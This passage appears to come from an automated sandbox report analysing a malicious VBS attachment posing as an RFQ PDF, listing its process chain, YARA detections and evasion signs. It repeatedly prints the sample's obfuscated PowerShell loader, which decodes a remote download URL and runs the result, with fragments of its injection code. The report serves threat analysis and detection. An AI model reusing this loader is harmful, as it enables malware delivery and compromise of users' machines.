lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8AD612
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9B8AC866
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 1_2_00007FFD9BB2141A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 6_2_0739D448
              Source: RFQ_24196MR_PDF.vbs; Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\msiexec.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
              Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7288
              Source: unknown; Process created: Commandline size = 7288
              Source: amsi64_7100.amsi.csv, type: OTHER; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_6288.amsi.csv, type: OTHER; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTR; Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine; Classification label: mal100.troj.expl.evad.winVBS@9/11@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Roaming\Solidifiable.Sch
              Source: C:\Windows\SysWOW64\WerFault.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4092
              Source: C:\Windows\SysWOW64\msiexec.exe; Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otjk2z2d.zfa.ps1
              Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7100
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6288
              Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RFQ_24196MR_PDF.vbs; ReversingLabs: Detection: 31%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. 
befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr 
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, wbemcomn.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, fwpuclnt.dll, rasadhlp.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: m.pdbpdbtem.pdb source: powershell.exe, 00000001.00000002.1907996504.000001DED9F10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdbwq source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: t.Automation.pdb% source: powershell.exe, 00000001.00000002.1944275574.000001DEF3F22000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERCD38.tmp.dmp.11.dr
              Source: Binary string: hqm.Core.pdb source: powershell.exe, 00000006.00000002.2123074697.000000000724C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2090574709.0000000002A61000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Fain", "0")
              Source: Yara match File source: 00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Suku)$GlObAL:kONSumPtiOn = [SysTEm.TExt.enCoDIng]::asCII.GeTsTRing($cORIOLanuS)$GlobAl:sulFonerER=$kOnSUMPtiON.subSTRIng($gErsHWiN,$RUNOlOgs)<#forurenede Immuniseringernes Frkenklost
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Experientialistic $Fedtkirtelen $Eksklusionen), (Idssdramaets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hexonic = [AppDomain]::CurrentDomain.GetAssem
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Brenden)), $Renteindtgts).DefineDynamicModule($Brugerdefineret, $false).DefineType($Gambrelled, $Oaring, [System.MulticastDelegate])$S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Suku)$GlObAL:kONSumPtiOn = [SysTEm.TExt.enCoDIng]::asCII.GeTsTRing($cORIOLanuS)$GlobAl:sulFonerER=$kOnSUMPtiON.subSTRIng($gErsHWiN,$RUNOlOgs)<#forurenede Immuniseringernes Frkenklost
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr 
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. 
befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8A815F push ebx; ret 1_2_00007FFD9B8A816A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0739AD52 push esi; ret 6_2_0739AD57
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5489
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4447
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5996
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3769
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -2767011611056431s >= -30000s
              Source: powershell.exe, 00000001.00000002.1944944407.000001DEF4100000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWmple%SystemRoot%\system32\mswsock.dllWebServiceProxy",
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWB
              Source: wscript.exe, 00000000.00000002.1723980646.000002109EF31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_7100.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
